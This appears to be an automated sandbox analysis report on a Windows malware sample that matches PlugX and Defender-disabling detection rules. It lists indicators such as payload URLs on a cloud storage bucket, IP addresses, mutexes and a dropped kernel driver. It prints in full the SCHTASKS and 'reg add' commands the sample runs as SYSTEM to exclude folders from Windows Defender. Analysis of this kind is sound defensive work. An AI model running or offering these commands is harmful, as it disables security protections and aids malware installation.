              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifK
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifS
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifW
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.giff
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifg
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif/S
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif3Ss
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif:
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gifBS
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif#
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif1S
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifFS
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifFSw
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifH
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifIS7
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gifp
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2085978921.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.dat
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0)
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:50010 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 4.2.BEqRkb.exe.27f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 5.2.BEqRkb.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 40.2.2dHqG0.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTRMatched rule: PlugX Identifying Strings Author: Seth Hardy
              PE file contains section with special chars
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140006C95 NtAllocateVirtualMemory,4_2_0000000140006C95
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000C3F04_2_000000014000C3F0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000CC004_2_000000014000CC00
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140001A304_2_0000000140001A30
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000C2A04_2_000000014000C2A0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400022C04_2_00000001400022C0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400110F04_2_00000001400110F0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140010CF04_2_0000000140010CF0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400093004_2_0000000140009300
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000BB704_2_000000014000BB70
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140003F804_2_0000000140003F80
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400103D04_2_00000001400103D0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A5202484_2_00007FFE1A520248
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A51A1B84_2_00007FFE1A51A1B8
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B24AE240_2_00B24AE2
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C4AE242_2_006C4AE2
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\2dHqG0\2dHqG0.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2o63254452-763487230.06.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: 4.2.BEqRkb.exe.27f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 5.2.BEqRkb.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 40.2.2dHqG0.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTRMatched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12
              Source: 189atohci.sys.0.drBinary string: \Device\Driver\
              Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
              Source: classification engineClassification label: mal100.troj.evad.winEXE@67/29@8/3
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,4_2_0000000140001430
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
              Source: C:\Users\user\Documents\BEqRkb.exeFile created: C:\Program Files (x86)\2dHqG0Jump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].datJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7520:120:WilError_03
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:932:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\47.243.243.58:8917:Sauron
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7800:120:WilError_03
              Source: C:\Users\user\Documents\BEqRkb.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6460:120:WilError_03
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_358075
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCommand line argument: tbcore3.dll40_2_00B21000
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCommand line argument: tbcore3.dll40_2_00B21000
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCommand line argument: tbcore3U.dll40_2_00B21000
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCommand line argument: tbcore3U.dll40_2_00B21000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: tbcore3.dll42_2_006C1000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: tbcore3.dll42_2_006C1000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: tbcore3U.dll42_2_006C1000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: tbcore3U.dll42_2_006C1000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: .l42_2_006C2E30
              Source: 2o63254452-763487230.06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Documents\BEqRkb.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 2o63254452-763487230.06.exeVirustotal: Detection: 11%
              Source: 2dHqG0.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: 2dHqG0.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: 2dHqG0.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: 2dHqG0.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: 2dHqG0.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: 2dHqG0.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile read: C:\Users\user\Desktop\2o63254452-763487230.06.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\2o63254452-763487230.06.exe "C:\Users\user\Desktop\2o63254452-763487230.06.exe"
              Source: unknownProcess created: C:\Users\user\Documents\BEqRkb.exe C:\Users\user\Documents\BEqRkb.exe
              Source: unknownProcess created: C:\Users\user\Documents\BEqRkb.exe C:\Users\user\Documents\BEqRkb.exe
              Source: unknownProcess created: C:\Users\user\Documents\BEqRkb.exe C:\Users\user\Documents\BEqRkb.exe
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: unknownProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: unknownProcess created: C:\Program Files (x86)\8srsV\pw8XjN.exe "C:\Program Files (x86)\8srsV\pw8XjN.exe"
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
